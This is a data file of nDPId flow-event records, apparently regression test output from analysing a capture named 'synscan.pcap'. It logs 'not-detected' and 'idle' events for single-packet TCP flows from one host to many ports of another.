-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 